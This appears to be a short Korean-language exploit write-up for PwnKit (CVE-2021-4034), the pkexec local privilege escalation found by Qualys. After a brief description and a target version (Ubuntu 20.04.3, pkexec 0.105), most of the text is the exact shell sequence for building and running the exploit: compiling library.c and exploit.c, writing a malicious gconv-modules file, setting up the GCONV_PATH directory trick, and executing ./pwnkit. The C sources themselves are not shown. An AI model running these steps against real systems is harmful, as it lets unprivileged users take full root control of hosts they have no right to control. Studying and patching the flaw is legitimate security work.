
PwnKit - polkit의 pkexec에서 발견된 로컬 권한 상승 취약점 (CVE-2021-4034)
Qualys Research Team은 polkit의 pkexec에서 메모리 손상 취약점을 발견했습니다. pkexec는 모든 주요 Linux 배포판에 기본적으로 설치되는 SUID-root 프로그램입니다. 이 취약점은 쉽게 악용할 수 있으며, 기본 구성에서 이 취약점을 악용하여 권한이 없는 사용자가 취약한 호스트에서 전체 루트 권한을 얻을 수 있습니다.
PwnKit: polkit의 pkexec에서 발견된 로컬 권한 상승 취약점 (CVE-2021-4034)
Ubuntu 20.04.3 LTS x86_64
pkexec 버전 0.105
mkdir /tmp/pwnkit_lpe/
gcc -shared -o /tmp/pwnkit_lpe/pwnkit.so -fPIC ./library.c
gcc ./exploit.c -o /tmp/pwnkit_lpe/pwnkit
echo "module UTF-8// PWNKIT// pwnkit 1" > /tmp/pwnkit_lpe/gconv-modules
mkdir -p "/tmp/pwnkit_lpe/GCONV_PATH=."
cp /usr/bin/true "/tmp/pwnkit_lpe/GCONV_PATH=./pwnkit.so:."
cd /tmp/pwnkit_lpe/
./pwnkit